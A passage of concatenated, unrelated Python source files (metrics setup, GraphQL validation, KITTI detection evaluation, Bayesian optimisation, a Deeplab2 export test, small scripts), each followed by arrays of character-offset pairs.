29928,
29945
]
],
[
[
683,
695
],
[
28246,
28258
],
[
28574,
28586
],
[
28627,
28639
],
[
28684,
28696
],
[
28803,
28815
],
[
28926,
28938
],
[
28979,
28991
],
[
29034,
29046
],
[
29415,
29427
],
[
29468,
29480
],
[
29524,
29536
],
[
29992,
30004
],
[
30047,
30059
],
[
30101,
30113
],
[
30438,
30450
],
[
30725,
30737
],
[
30777,
30789
],
[
30829,
30841
],
[
30889,
30901
],
[
30946,
30958
],
[
31003,
31015
],
[
31058,
31070
],
[
115093,
115105
]
],
[
[
725,
738
],
[
28465,
28478
],
[
28523,
28536
],
[
29086,
29099
],
[
29146,
29159
]
],
[
[
768,
780
],
[
172551,
172563
]
],
[
[
810,
827
],
[
27932,
27949
]
],
[
[
857,
877
],
[
28056,
28076
],
[
31164,
31184
],
[
31222,
31242
],
[
31276,
31296
]
],
[
[
921,
930
],
[
19279,
19288
]
],
[
[
961,
968
],
[
35199,
35206
],
[
35284,
35291
],
[
42058,
42065
],
[
42120,
42127
],
[
42177,
42184
],
[
42241,
42248
],
[
43104,
43111
],
[
43218,
43225
],
[
47507,
47514
],
[
47577,
47584
],
[
47642,
47649
],
[
47714,
47721
],
[
48660,
48667
],
[
48782,
48789
],
[
105047,
105054
],
[
105118,
105125
],
[
110359,
110366
],
[
110429,
110436
],
[
114775,
114782
],
[
130055,
130062
],
[
130340,
130347
],
[
130487,
130494
],
[
131901,
131908
],
[
132761,
132768
],
[
132810,
132817
],
[
132876,
132883
],
[
132948,
132955
],
[
157376,
157383
],
[
157445,
157452
],
[
158184,
158191
],
[
158253,
158260
],
[
158272,
158279
],
[
158342,
158349
],
[
158361,
158368
],
[
158716,
158723
],
[
158819,
158826
],
[
159238,
159245
],
[
171020,
171027
],
[
171211,
171218
],
[
171270,
171277
],
[
171380,
171387
],
[
171729,
171736
],
[
171856,
171863
],
[
171954,
171961
]
],
[
[
977,
983
],
[
1058,
1064
]
]
] |
from prometheus_client import CollectorRegistry
from asyncworker.conf import settings
from asyncworker.metrics.collectors.gc import GCCollector
from asyncworker.metrics.collectors.platform import PlatformCollector
from asyncworker.metrics.collectors.process import ProcessCollector
NAMESPACE = (
f"{settings.METRICS_NAMESPACE}_{settings.METRICS_APPPREFIX}"
if settings.METRICS_APPPREFIX
else f"{settings.METRICS_NAMESPACE}"
)
REGISTRY = CollectorRegistry(auto_describe=True)
PLATFORM_COLLECTOR = PlatformCollector(registry=REGISTRY, namespace=NAMESPACE)
PROCESS_COLLECTOR = ProcessCollector(namespace=NAMESPACE, registry=REGISTRY)
GC_COLLECTOR = GCCollector(registry=REGISTRY, namespace=NAMESPACE)
| [
[
[
30,
47
],
[
453,
470
]
],
[
[
78,
86
],
[
370,
378
],
[
305,
313
],
[
334,
342
],
[
409,
417
]
],
[
[
133,
144
],
[
663,
674
]
],
[
[
197,
214
],
[
513,
530
]
],
[
[
266,
282
],
[
591,
607
]
],
[
[
284,
293
],
[
560,
569
],
[
618,
627
],
[
704,
713
]
],
[
[
442,
450
],
[
540,
548
],
[
638,
646
],
[
684,
692
]
],
[
[
492,
510
]
],
[
[
571,
588
]
],
[
[
648,
660
]
]
] |
from typing import Dict, Optional, Union
from ...error import GraphQLError
from ...language import (
OperationTypeDefinitionNode,
OperationType,
SchemaDefinitionNode,
SchemaExtensionNode,
)
from ...type import GraphQLObjectType
from . import SDLValidationContext, SDLValidationRule
__all__ = ["UniqueOperationTypesRule"]
class UniqueOperationTypesRule(SDLValidationRule):
"""Unique operation types
A GraphQL document is only valid if it has only one type per operation.
"""
def __init__(self, context: SDLValidationContext):
super().__init__(context)
schema = context.schema
self.defined_operation_types: Dict[
OperationType, OperationTypeDefinitionNode
] = {}
self.existing_operation_types: Dict[
OperationType, Optional[GraphQLObjectType]
] = (
{
OperationType.QUERY: schema.query_type,
OperationType.MUTATION: schema.mutation_type,
OperationType.SUBSCRIPTION: schema.subscription_type,
}
if schema
else {}
)
self.schema = schema
def check_operation_types(
self, node: Union[SchemaDefinitionNode, SchemaExtensionNode], *_args
):
for operation_type in node.operation_types or []:
operation = operation_type.operation
already_defined_operation_type = self.defined_operation_types.get(operation)
if self.existing_operation_types.get(operation):
self.report_error(
GraphQLError(
f"Type for {operation.value} already defined in the schema."
" It cannot be redefined.",
operation_type,
)
)
elif already_defined_operation_type:
self.report_error(
GraphQLError(
f"There can be only one {operation.value} type in schema.",
[already_defined_operation_type, operation_type],
)
)
else:
self.defined_operation_types[operation] = operation_type
return self.SKIP
enter_schema_definition = enter_schema_extension = check_operation_types
| [
[
[
19,
23
],
[
667,
671
],
[
782,
786
]
],
[
[
25,
33
],
[
815,
823
]
],
[
[
35,
40
],
[
1206,
1211
]
],
[
[
63,
75
],
[
1583,
1595
],
[
1918,
1930
]
],
[
[
106,
133
],
[
700,
727
]
],
[
[
139,
152
],
[
685,
698
],
[
887,
900
],
[
943,
956
],
[
1005,
1018
],
[
800,
813
]
],
[
[
158,
178
],
[
1212,
1232
]
],
[
[
184,
203
],
[
1234,
1253
]
],
[
[
227,
244
],
[
824,
841
]
],
[
[
259,
279
],
[
540,
560
]
],
[
[
281,
298
],
[
372,
389
]
],
[
[
300,
307
]
],
[
[
347,
371
]
]
] |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from enum import Enum
__all__ = [
'CostAllocationPolicyType',
'CostAllocationResourceType',
'RuleStatus',
]
class CostAllocationPolicyType(str, Enum):
"""
Method of cost allocation for the rule
"""
FIXED_PROPORTION = "FixedProportion"
class CostAllocationResourceType(str, Enum):
"""
Type of resources contained in this cost allocation rule
"""
DIMENSION = "Dimension"
TAG = "Tag"
class RuleStatus(str, Enum):
"""
Status of the rule
"""
NOT_ACTIVE = "NotActive"
ACTIVE = "Active"
PROCESSING = "Processing"
| [
[
[
186,
190
],
[
328,
332
],
[
475,
479
],
[
627,
631
]
],
[
[
192,
199
]
],
[
[
298,
322
]
],
[
[
443,
469
]
],
[
[
611,
621
]
]
] |
import os
import numpy as np
import torch
import torch.nn.functional as F
from lib.utils.bbox_transform import decode_bbox_target
from tools.kitti_object_eval_python.evaluate import evaluate as kitti_evaluate
from lib.config import cfg
import lib.utils.kitti_utils as kitti_utils
import lib.utils.iou3d.iou3d_utils as iou3d_utils
from datetime import datetime
from tensorboardX import SummaryWriter
import tqdm
np.random.seed(1024) # set the same seed
def save_kitti_format(sample_id, calib, bbox3d, kitti_output_dir, scores, img_shape):
corners3d = kitti_utils.boxes3d_to_corners3d(bbox3d)
img_boxes, _ = calib.corners3d_to_img_boxes(corners3d)
img_boxes[:, 0] = np.clip(img_boxes[:, 0], 0, img_shape[1] - 1)
img_boxes[:, 1] = np.clip(img_boxes[:, 1], 0, img_shape[0] - 1)
img_boxes[:, 2] = np.clip(img_boxes[:, 2], 0, img_shape[1] - 1)
img_boxes[:, 3] = np.clip(img_boxes[:, 3], 0, img_shape[0] - 1)
img_boxes_w = img_boxes[:, 2] - img_boxes[:, 0]
img_boxes_h = img_boxes[:, 3] - img_boxes[:, 1]
box_valid_mask = np.logical_and(
img_boxes_w < img_shape[1] * 0.8, img_boxes_h < img_shape[0] * 0.8)
kitti_output_file = os.path.join(kitti_output_dir, '%06d.txt' % sample_id)
with open(kitti_output_file, 'w') as f:
for k in range(bbox3d.shape[0]):
if box_valid_mask[k] == 0:
continue
x, z, ry = bbox3d[k, 0], bbox3d[k, 2], bbox3d[k, 6]
beta = np.arctan2(z, x)
alpha = -np.sign(beta) * np.pi / 2 + beta + ry
print('%s -1 -1 %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f' %
(cfg.CLASSES, alpha, img_boxes[k, 0], img_boxes[k, 1], img_boxes[k, 2], img_boxes[k, 3],
bbox3d[k, 3], bbox3d[k, 4], bbox3d[k,
5], bbox3d[k, 0], bbox3d[k, 1], bbox3d[k, 2],
bbox3d[k, 6], scores[k]), file=f)
def eval_one_epoch_joint(model, dataloader, epoch_id, result_dir):
# print("-----------------joint____________________________*******")
np.random.seed(666)
MEAN_SIZE = torch.from_numpy(cfg.CLS_MEAN_SIZE[0]).cuda()
mode = 'EVAL'
final_output_dir = os.path.join(result_dir, 'final_result', 'data')
os.makedirs(final_output_dir, exist_ok=True)
if True:
# print("------------save_result__________________*******")
roi_output_dir = os.path.join(result_dir, 'roi_result', 'data')
refine_output_dir = os.path.join(result_dir, 'refine_result', 'data')
rpn_output_dir = os.path.join(result_dir, 'rpn_result', 'data')
os.makedirs(rpn_output_dir, exist_ok=True)
os.makedirs(roi_output_dir, exist_ok=True)
os.makedirs(refine_output_dir, exist_ok=True)
model.eval()
thresh_list = [0.1, 0.3, 0.5, 0.7, 0.9]
total_recalled_bbox_list, total_gt_bbox = [0] * 5, 0
total_roi_recalled_bbox_list = [0] * 5
dataset = dataloader.dataset
cnt = final_total = total_cls_acc = total_cls_acc_refined = total_rpn_iou = 0
progress_bar = tqdm.tqdm(total=len(dataloader), leave=True, desc='eval')
for data in dataloader:
cnt += 1
calib = data['calib']
sample_id, pts_rect, pts_features, pts_input = \
data['sample_id'], data['pts_rect'], data['pts_features'], data['pts_input']
batch_size = len(sample_id)
inputs = torch.from_numpy(pts_input).cuda(non_blocking=True).float()
input_data = {'pts_input': inputs, 'calib': calib}
# model inference
ret_dict = model(input_data)
print(ret_dict.key())
roi_scores_raw = ret_dict['roi_scores_raw'] # (B, M)
roi_boxes3d = ret_dict['rois'] # (B, M, 7)
seg_result = ret_dict['seg_result'].long() # (B, N)
rcnn_cls = ret_dict['rcnn_cls'].view(
batch_size, -1, ret_dict['rcnn_cls'].shape[1])
rcnn_reg = ret_dict['rcnn_reg'].view(
batch_size, -1, ret_dict['rcnn_reg'].shape[1]) # (B, M, C)
# bounding box regression
anchor_size = MEAN_SIZE
if cfg.RCNN.SIZE_RES_ON_ROI:
assert False
pred_boxes3d = decode_bbox_target(roi_boxes3d.view(-1, 7), rcnn_reg.view(-1, rcnn_reg.shape[-1]),
anchor_size=anchor_size,
loc_scope=cfg.RCNN.LOC_SCOPE,
loc_bin_size=cfg.RCNN.LOC_BIN_SIZE,
num_head_bin=cfg.RCNN.NUM_HEAD_BIN,
get_xz_fine=True, get_y_by_bin=cfg.RCNN.LOC_Y_BY_BIN,
loc_y_scope=cfg.RCNN.LOC_Y_SCOPE, loc_y_bin_size=cfg.RCNN.LOC_Y_BIN_SIZE,
get_ry_fine=True).view(batch_size, -1, 7)
# scoring
if rcnn_cls.shape[2] == 1:
raw_scores = rcnn_cls # (B, M, 1)
norm_scores = torch.sigmoid(raw_scores)
pred_classes = (norm_scores > cfg.RCNN.SCORE_THRESH).long()
else:
pred_classes = torch.argmax(rcnn_cls, dim=1).view(-1)
cls_norm_scores = F.softmax(rcnn_cls, dim=1)
raw_scores = rcnn_cls[:, pred_classes]
norm_scores = cls_norm_scores[:, pred_classes]
# evaluation
recalled_num = gt_num = rpn_iou = 0
if not False:
if not cfg.RPN.FIXED:
rpn_cls_label, rpn_reg_label = data['rpn_cls_label'], data['rpn_reg_label']
rpn_cls_label = torch.from_numpy(
rpn_cls_label).cuda(non_blocking=True).long()
gt_boxes3d = data['gt_boxes3d']
for k in range(batch_size):
# calculate recall
cur_gt_boxes3d = gt_boxes3d[k]
tmp_idx = cur_gt_boxes3d.__len__() - 1
while tmp_idx >= 0 and cur_gt_boxes3d[tmp_idx].sum() == 0:
tmp_idx -= 1
if tmp_idx >= 0:
cur_gt_boxes3d = cur_gt_boxes3d[:tmp_idx + 1]
cur_gt_boxes3d = torch.from_numpy(
cur_gt_boxes3d).cuda(non_blocking=True).float()
iou3d = iou3d_utils.boxes_iou3d_gpu(
pred_boxes3d[k], cur_gt_boxes3d)
gt_max_iou, _ = iou3d.max(dim=0)
refined_iou, _ = iou3d.max(dim=1)
for idx, thresh in enumerate(thresh_list):
total_recalled_bbox_list[idx] += (
gt_max_iou > thresh).sum().item()
recalled_num += (gt_max_iou > 0.7).sum().item()
gt_num += cur_gt_boxes3d.shape[0]
total_gt_bbox += cur_gt_boxes3d.shape[0]
# original recall
iou3d_in = iou3d_utils.boxes_iou3d_gpu(
roi_boxes3d[k], cur_gt_boxes3d)
gt_max_iou_in, _ = iou3d_in.max(dim=0)
for idx, thresh in enumerate(thresh_list):
total_roi_recalled_bbox_list[idx] += (
gt_max_iou_in > thresh).sum().item()
if not cfg.RPN.FIXED:
fg_mask = rpn_cls_label > 0
correct = ((seg_result == rpn_cls_label)
& fg_mask).sum().float()
union = fg_mask.sum().float() + (seg_result > 0).sum().float() - correct
rpn_iou = correct / torch.clamp(union, min=1.0)
total_rpn_iou += rpn_iou.item()
disp_dict = {
'mode': mode, 'recall': '%d/%d' % (total_recalled_bbox_list[3], total_gt_bbox)}
progress_bar.set_postfix(disp_dict)
progress_bar.update()
if True:
# save roi and refine results
roi_boxes3d_np = roi_boxes3d.cpu().numpy()
pred_boxes3d_np = pred_boxes3d.cpu().numpy()
roi_scores_raw_np = roi_scores_raw.cpu().numpy()
raw_scores_np = raw_scores.cpu().numpy()
rpn_cls_np = ret_dict['rpn_cls'].cpu().numpy()
rpn_xyz_np = ret_dict['backbone_xyz'].cpu().numpy()
seg_result_np = seg_result.cpu().numpy()
output_data = np.concatenate((rpn_xyz_np, rpn_cls_np.reshape(batch_size, -1, 1),
seg_result_np.reshape(batch_size, -1, 1)), axis=2)
for k in range(batch_size):
cur_sample_id = sample_id[k]
calib = dataset.get_calib(cur_sample_id)
image_shape = dataset.get_image_shape(cur_sample_id)
save_kitti_format(cur_sample_id, calib, roi_boxes3d_np[k], roi_output_dir,
roi_scores_raw_np[k], image_shape)
save_kitti_format(cur_sample_id, calib, pred_boxes3d_np[k], refine_output_dir,
raw_scores_np[k], image_shape)
output_file = os.path.join(
rpn_output_dir, '%06d.npy' % cur_sample_id)
np.save(output_file, output_data.astype(np.float32))
# scores thresh
inds = norm_scores > cfg.RCNN.SCORE_THRESH
for k in range(batch_size):
cur_inds = inds[k].view(-1)
if cur_inds.sum() == 0:
continue
pred_boxes3d_selected = pred_boxes3d[k, cur_inds]
raw_scores_selected = raw_scores[k, cur_inds]
norm_scores_selected = norm_scores[k, cur_inds]
# NMS thresh
# rotated nms
boxes_bev_selected = kitti_utils.boxes3d_to_bev_torch(
pred_boxes3d_selected)
keep_idx = iou3d_utils.nms_gpu(
boxes_bev_selected, raw_scores_selected, cfg.RCNN.NMS_THRESH).view(-1)
pred_boxes3d_selected = pred_boxes3d_selected[keep_idx]
scores_selected = raw_scores_selected[keep_idx]
pred_boxes3d_selected, scores_selected = pred_boxes3d_selected.cpu(
).numpy(), scores_selected.cpu().numpy()
cur_sample_id = sample_id[k]
calib = dataset.get_calib(cur_sample_id)
final_total += pred_boxes3d_selected.shape[0]
image_shape = dataset.get_image_shape(cur_sample_id)
save_kitti_format(cur_sample_id, calib, pred_boxes3d_selected,
final_output_dir, scores_selected, image_shape)
progress_bar.close()
# dump empty files
split_file = os.path.join(dataset.imageset_dir,
'..', '..', 'ImageSets', dataset.split + '.txt')
split_file = os.path.abspath(split_file)
image_idx_list = [x.strip() for x in open(split_file).readlines()]
empty_cnt = 0
for k in range(image_idx_list.__len__()):
cur_file = os.path.join(final_output_dir, '%s.txt' % image_idx_list[k])
if not os.path.exists(cur_file):
with open(cur_file, 'w') as temp_f:
pass
empty_cnt += 1
ret_dict = {'empty_cnt': empty_cnt}
avg_rpn_iou = (total_rpn_iou / max(cnt, 1.0))
avg_cls_acc = (total_cls_acc / max(cnt, 1.0))
avg_cls_acc_refined = (total_cls_acc_refined / max(cnt, 1.0))
avg_det_num = (final_total / max(len(dataset), 1.0))
ret_dict['rpn_iou'] = avg_rpn_iou
ret_dict['rcnn_cls_acc'] = avg_cls_acc
ret_dict['rcnn_cls_acc_refined'] = avg_cls_acc_refined
ret_dict['rcnn_avg_num'] = avg_det_num
for idx, thresh in enumerate(thresh_list):
cur_roi_recall = total_roi_recalled_bbox_list[idx] / max(
total_gt_bbox, 1.0)
ret_dict['rpn_recall(thresh=%.2f)' % thresh] = cur_roi_recall
for idx, thresh in enumerate(thresh_list):
cur_recall = total_recalled_bbox_list[idx] / max(total_gt_bbox, 1.0)
ret_dict['rcnn_recall(thresh=%.2f)' % thresh] = cur_recall
if cfg.TEST.SPLIT != 'test':
name_to_class = {'Car': 0, 'Pedestrian': 1, 'Cyclist': 2}
ap_result_str, ap_dict = kitti_evaluate(dataset.label_dir, final_output_dir, label_split_file=split_file,
current_class=name_to_class[cfg.CLASSES])
ret_dict.update(ap_dict)
return ap_result_str
| [
[
[
7,
9
],
[
1175,
1177
],
[
2222,
2224
],
[
2275,
2277
],
[
2427,
2429
],
[
2502,
2504
],
[
2577,
2579
],
[
2632,
2634
],
[
2683,
2685
],
[
2734,
2736
],
[
9026,
9028
],
[
10555,
10557
],
[
10686,
10688
],
[
10868,
10870
],
[
10944,
10946
]
],
[
[
17,
28
],
[
413,
415
],
[
682,
684
],
[
750,
752
],
[
818,
820
],
[
886,
888
],
[
1058,
1060
],
[
1462,
1464
],
[
1500,
1502
],
[
1516,
1518
],
[
2098,
2100
],
[
8303,
8305
],
[
9120,
9122
],
[
9160,
9162
]
],
[
[
36,
41
],
[
2134,
2139
],
[
3410,
3415
],
[
4978,
4983
],
[
5117,
5122
],
[
5569,
5574
],
[
6123,
6128
],
[
7545,
7550
]
],
[
[
49,
73
],
[
5186,
5187
]
],
[
[
111,
129
],
[
4176,
4194
]
],
[
[
182,
208
],
[
12058,
12072
]
],
[
[
233,
236
],
[
1654,
1657
],
[
2151,
2154
],
[
4101,
4104
],
[
4378,
4381
],
[
4453,
4456
],
[
4531,
4534
],
[
4627,
4630
],
[
4704,
4707
],
[
4741,
4744
],
[
5046,
5049
],
[
5430,
5433
],
[
7232,
7235
],
[
9227,
9230
],
[
9827,
9830
],
[
11933,
11936
],
[
12215,
12218
]
],
[
[
244,
280
],
[
559,
570
],
[
9653,
9664
]
],
[
[
288,
330
],
[
6241,
6252
],
[
6872,
6883
],
[
9749,
9760
]
],
[
[
352,
360
]
],
[
[
386,
399
]
],
[
[
407,
411
],
[
3078,
3082
]
],
[
[
461,
478
],
[
8691,
8708
],
[
8851,
8868
],
[
10348,
10365
]
],
[
[
1958,
1978
]
]
] |
from math import log10
from sklearn.gaussian_process import GaussianProcessRegressor
from sklearn.gaussian_process.kernels import Matern
import numpy as np
from .utils import create_rng
class BO:
"""
Bayesian Optimization framework
"""
def __init__(self, k, hidden_dim=(100, 10000),
spectral_radius=(.9, 1.3), p=(0, 1),
alpha=(0, 1), beta=(1e-5, 1e3), random_state=None):
"""
Parameters
----------
k : tuple
Range of values for nearest neighbors in small-world network
hidden_dim : tuple, optional
Range values for the number of nodes in the reservoir
spectral_radius : tuple, optional
Range of values for the spectral radius for the reservoir
p : tuple, optional
Range of values to consider for the rewire probability
alpha : tuple, optional
Range of values for the leaking rate
beta : tuple, optional
Range of values for the L2 regression regularization
random_state : int or np.random.RandomState, optional
Random state initializer
"""
# Check that all the hyper-parameters are tuples with two entries
# which define the lower and upper bounds for the search space
hyper_params = [k, hidden_dim, spectral_radius, p, alpha, beta]
for param in hyper_params:
assert isinstance(param, tuple), "{} must be a tuple".format(param)
assert len(param) == 2, "{} must have two arguments; the upper" \
"and lower bound".format(param)
self.lwr_k = k[0]
self.upr_k = k[1]
self.lwr_hidden_dim = hidden_dim[0]
self.upr_hidden_dim = hidden_dim[1]
self.lwr_spectral_radius = spectral_radius[0]
self.upr_spectral_radius = spectral_radius[1]
self.lwr_p = p[0]
self.upr_p = p[1]
self.lwr_alpha = alpha[0]
self.upr_alpha = alpha[1]
self.lwr_beta = beta[0]
self.upr_beta = beta[1]
self.rng = create_rng(random_state)
self.gpr = GaussianProcessRegressor(kernel=Matern(),
random_state=self.rng)
# We need a placeholder for different hyper-parameter values that
# arrive and the corresponding error values
self.H = []
self.y = []
def update_gpr(self, X, y):
"""
Updates the Gaussian process with new data and error value
Updates the Gaussian process by adding, `H`, the list of
hyper-parameter values that were used with true function and y
is the resulting error from the model
Parameters
----------
X : list
Hyper-parameter values that were tried
y : float
Error that resulted from using X on the true function
Returns
-------
None
"""
self.H.append(X)
self.y.append(y)
self.gpr.fit(self.H, self.y)
def _sample_uniformly(self, num_samples, lwr_bound, upr_bound):
"""
Samples uniformly from a non-uniform space
Parameters
----------
num_samples : int
Number of samples to generate
lwr_bound : float
Hyper-parameter lower bound
upr_bound : float
Hyper-parameter upper bound
Returns
-------
param_vals : np.ndarray
Uniformly sampled hyper-parameter values
"""
# To sample in a uniform fashion we need the base ten representation
# of the upper and lower bounds and then we treat this as a region
# to sample
new_lwr_bound = log10(lwr_bound)
new_upr_bound = log10(upr_bound)
samples = self.rng.uniform(low=new_lwr_bound, high=new_upr_bound,
size=(num_samples, 1))
param_vals = np.power(10, samples)
return param_vals
def _build_options(self, num_samples=1000):
"""
Builds matrix which defines possible options for this iteration
Parameters
----------
num_samples : int, optional
Number of hyper-parameter samples to generate
Returns
-------
H_space : np.ndarray
Matrix of options for the ESN hyper-parameters
"""
k_vals = self.rng.randint(low=self.lwr_k, high=self.upr_k,
size=(num_samples, 1), dtype=np.int32)
hidden_dim_vals = self.rng.randint(low=self.lwr_hidden_dim,
high=self.upr_hidden_dim,
size=(num_samples, 1),
dtype=np.int32)
spectral_radius_vals = self.rng.uniform(low=self.lwr_spectral_radius,
high=self.upr_spectral_radius,
size=(num_samples, 1))
p_vals = self.rng.uniform(low=self.lwr_p, high=self.upr_p,
size=(num_samples, 1))
alpha_vals = self.rng.uniform(low=self.lwr_alpha, high=self.upr_alpha,
size=(num_samples, 1))
beta_vals = self._sample_uniformly(num_samples, self.lwr_beta,
self.upr_beta)
H_space = np.concatenate([k_vals, hidden_dim_vals,
spectral_radius_vals, p_vals, alpha_vals,
beta_vals], axis=1)
return H_space
def find_best_choices(self, num_samples=1000, num_choices=1):
"""
Finds the best hyper-parameter combination
Parameters
----------
num_samples : int, optional
Number of hyper-parameter samples to generate
num_choices : int, optional
Number of choices to select
Returns
-------
param_vals : dict
Best hyper-parameter values for the current Gaussian process
"""
H_space = self._build_options(num_samples)
# For the first MPI iteration because there is no prior, randomly
# sample num_choices points
if num_choices > 1:
idx = self.rng.choice(np.arange(num_samples), size=num_choices,
replace=False)
best_vals = H_space[idx, :]
else:
y_pred = self.gpr.sample_y(H_space, random_state=self.rng)
choices = np.argmin(y_pred)
best_vals = H_space[choices, :]
hyper_parameters = ['k', 'hidden_dim', 'spectral_radius', 'p', 'alpha',
'beta']
param_vals = {}
for (i, val) in enumerate(hyper_parameters):
if num_choices == 1:
param_vals[val] = best_vals[i]
if (val == 'k') or (val == 'hidden_dim'):
param_vals[val] = int(param_vals[val])
else:
param_vals[val] = best_vals[:, i]
if (val == 'k') or (val == 'hidden_dim'):
param_vals[val] = param_vals[val].astype(int)
return param_vals
def return_best_parameters(self):
min_error = min(self.y)
index = self.y.index(min_error)
print("Minimum Validation Error = ", min_error)
print("Best parameters found = ", self.H[index])
return min_error, self.H[index]
| [
[
[
17,
22
],
[
3747,
3752
],
[
3788,
3793
]
],
[
[
60,
84
],
[
2140,
2164
]
],
[
[
130,
136
],
[
2172,
2178
]
],
[
[
144,
155
],
[
3958,
3960
],
[
4536,
4538
],
[
4799,
4801
],
[
5453,
5455
],
[
6355,
6357
],
[
6593,
6595
]
],
[
[
175,
185
],
[
2096,
2106
]
],
[
[
194,
196
]
]
] |
# coding=utf-8
# Copyright 2022 The Deeplab2 Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests of model exports for axial_resnet_instances."""
import os
from absl import flags
from absl.testing import parameterized
import tensorflow as tf
from deeplab2.model.encoder import axial_resnet_instances
FLAGS = flags.FLAGS
class ModelExportTest(tf.test.TestCase, parameterized.TestCase):
@parameterized.parameters(
('resnet50',),
('resnet50_beta',),
('max_deeplab_s_backbone',),
('max_deeplab_l_backbone',),
('axial_resnet_s',),
('axial_resnet_l',),
('axial_deeplab_s',),
('axial_deeplab_l',),
('swidernet',),
('axial_swidernet',),
)
def test_model_export(self, model_name):
model = axial_resnet_instances.get_model(
model_name,
output_stride=16,
backbone_layer_multiplier=1.0,
bn_layer=tf.keras.layers.BatchNormalization,
conv_kernel_weight_decay=0.0001,
# Test with small models only.
num_blocks=[2, 2, 2, 2],
# Disable drop path as it is not compatible with model exporting.
block_group_config={'drop_path_keep_prob': 1.0})
model(tf.keras.Input([257, 257, 3], batch_size=1), training=False)
export_dir = os.path.join(
FLAGS.test_tmpdir, 'test_model_export', model_name)
model.save(export_dir)
if __name__ == '__main__':
tf.test.main()
| [
[
[
666,
668
],
[
1777,
1779
]
],
[
[
687,
692
],
[
824,
829
]
],
[
[
718,
731
],
[
878,
891
],
[
907,
920
]
],
[
[
739,
755
],
[
860,
862
],
[
1909,
1911
],
[
1409,
1411
],
[
1699,
1701
]
],
[
[
792,
814
],
[
1273,
1295
]
],
[
[
816,
821
],
[
1799,
1804
]
],
[
[
844,
859
]
]
] |
from rip_pages import rip_pages
from read_pages import read_pages
from format_csv import format_csv
# STEP 1: CONFIG VARIABLES
SOURCE_DOC = '114sdoc7'
FILE_NAME = "GPO-CDOC-" + SOURCE_DOC + ".pdf"
OUT_FILE = 'senate_data.csv'
MISSING_FILE = 'missing_data.json'
START_PAGE = 17
END_PAGE = 2259
# STEP 2: Rip text, read pages, format output
rip_pages(FILE_NAME, START_PAGE, END_PAGE)
read_pages(START_PAGE, END_PAGE, OUT_FILE, MISSING_FILE)
format_csv(SOURCE_DOC, OUT_FILE)
# STEP 3: Reconcile data in MISSING_FILE
| [
[
[
22,
31
],
[
341,
350
]
],
[
[
55,
65
],
[
384,
394
]
],
[
[
89,
99
],
[
441,
451
]
],
[
[
128,
138
],
[
178,
188
],
[
452,
462
]
],
[
[
152,
161
],
[
351,
360
]
],
[
[
198,
206
],
[
417,
425
],
[
464,
472
]
],
[
[
227,
239
],
[
427,
439
]
],
[
[
262,
272
],
[
362,
372
],
[
395,
405
]
],
[
[
278,
286
],
[
374,
382
],
[
407,
415
]
]
] |
my_list = [1, 2, 2, 4, 6]
#print reverse
print(my_list[::-1])
student = {'user': 'Lubo',
'pass': 'admin',
'course': ['C# Fundamentals', 'C# ASP', 'Algorithms']}
for key in student:
print(key)
for kvp in student.items():
print(f'the key is: {kvp[0]}, and values are: {kvp[1]} ')
print(student['pass'])
print(student.get('Pass', 'Sorry mate no such key'))
if 'pass' in student.keys():
print('Here')
else:
print('Not here')
second_part_student = {
'age': 25
}
student.update(second_part_student)
print(student)
| [
[
[
0,
7
],
[
47,
54
]
],
[
[
63,
70
],
[
196,
203
],
[
232,
239
],
[
319,
326
],
[
342,
349
],
[
403,
410
],
[
506,
513
],
[
548,
555
]
],
[
[
189,
192
],
[
215,
218
]
],
[
[
225,
228
],
[
274,
277
],
[
300,
303
]
],
[
[
466,
485
],
[
521,
540
]
]
] |
import datetime
from dateutil.relativedelta import relativedelta
print("Programa para calcular o prazo de exame de ultrassom...\nO mesmo deve ser feito entre 22 e 24 semanas de gestação")
print("você deverá informar com quantas semanasa de gestação a paciente se encontra, no formato aaaa/mm/dd")
semanas = int(input("Com quantas semanas de gestação a paciente se encontra hoje? "))
exameInicio = 22-semanas
exameFinal = 24 - semanas
morfologicoInicio = datetime.date.today()+ relativedelta(weeks=exameInicio)
morfologicoFinal = datetime.date.today() + relativedelta(weeks=exameFinal)
dfinal = morfologicoFinal.strftime('%d/%m/%Y')
dinicial = morfologicoInicio.strftime('%d/%m/%Y')
print("O exame deverá ser feito entre ",dinicial, " e ", dfinal) | [
[
[
7,
15
],
[
456,
464
],
[
531,
539
]
],
[
[
51,
64
],
[
479,
492
],
[
555,
568
]
],
[
[
298,
305
],
[
401,
408
],
[
427,
434
]
],
[
[
384,
395
],
[
499,
510
]
],
[
[
409,
419
],
[
575,
585
]
],
[
[
436,
453
],
[
645,
662
]
],
[
[
512,
528
],
[
596,
612
]
],
[
[
587,
593
],
[
742,
748
]
],
[
[
634,
642
],
[
725,
733
]
]
] |
from __future__ import annotations
from typing import Generator, NoReturn
class StdReader:
def __init__(
self,
) -> NoReturn:
import sys
self.buf = sys.stdin.buffer
self.lines = self.async_readlines()
self.chunks: Generator
def async_readlines(
self,
) -> Generator:
while True:
gen = self.line_chunks()
yield gen
def line_chunks(
self,
) -> Generator:
ln = self.buf.readline()
for chunk in ln.split():
yield chunk
def __call__(
self,
) -> bytes:
try:
chunk = next(self.chunks)
except:
self.chunks = next(
self.lines,
)
chunk = self()
return chunk
def str(
self,
) -> str:
b = self()
return b.decode()
def int(
self,
) -> int:
return int(self.str())
from abc import ABC, abstractmethod
class Solver(ABC):
def __init__(self):
self.reader = StdReader()
def __call__(
self,
):
self.prepare()
self.solve()
@abstractmethod
def prepare(self):
...
@abstractmethod
def solve(self):
...
import numpy as np
from scipy.sparse import csr_matrix
from scipy.sparse.csgraph import floyd_warshall
class Problem(
Solver,
):
def prepare(self):
reader = self.reader
n = reader.int()
m = reader.int()
a = [reader.int() for _ in range(3 * m)]
a = np.array(
a,
).reshape(m, 3)
a, b, t = a.T
self.n, self.m = n, m
self.a = a - 1
self.b = b - 1
self.t = t
def solve(self):
self.compute_dist_mat()
dist = self.dist
d = dist.max(axis=1).min()
print(int(d))
def compute_dist_mat(
self,
):
n = self.n
a = self.a
